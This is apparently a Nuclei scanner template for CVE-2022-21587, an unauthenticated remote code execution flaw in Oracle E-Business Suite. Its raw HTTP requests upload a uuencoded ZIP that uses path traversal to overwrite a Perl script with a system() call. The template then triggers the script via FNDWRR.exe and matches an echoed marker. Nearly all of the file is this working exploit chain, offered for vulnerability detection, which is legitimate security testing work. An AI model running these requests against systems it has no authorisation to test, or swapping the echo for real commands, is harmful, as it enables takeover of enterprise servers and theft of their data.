85 lines
3.4 KiB
YAML
85 lines
3.4 KiB
YAML
id: CVE-2022-21587
|
|
|
|
info:
|
|
name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
|
|
author: rootxharsh,iamnoooob,pdresearch
|
|
severity: critical
|
|
description: |
|
|
Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
reference:
|
|
- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
|
|
- https://www.oracle.com/security-alerts/cpuoct2022.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-21587
|
|
- http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-21587
|
|
cwe-id: CWE-94
|
|
cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
|
|
epss-score: 0.97405
|
|
metadata:
|
|
max-request: 3
|
|
tags: cve,intrusive,ebs,unauth,kev,cve2022,rce,oast,oracle,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
Content-Disposition: form-data; name="bne:uueupload"
|
|
|
|
TRUE
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
|
|
|
|
begin 664 test.zip
|
|
M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
|
|
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
|
|
M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
|
|
M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
|
|
M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#
|
|
M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
|
|
M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R
|
|
G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
|
|
`
|
|
end
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv--
|
|
|
|
- |
|
|
GET /OA_CGI/FNDWRR.exe HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
Content-Disposition: form-data; name="bne:uueupload"
|
|
|
|
TRUE
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
|
|
|
|
begin 664 test.zip
|
|
M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
|
|
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
|
|
M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
|
|
M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
|
|
M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
|
|
(``!B````````
|
|
`
|
|
end
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- Nuclei-CVE-2022-21587
|
|
|
|
# Enhanced by md on 2023/03/21
|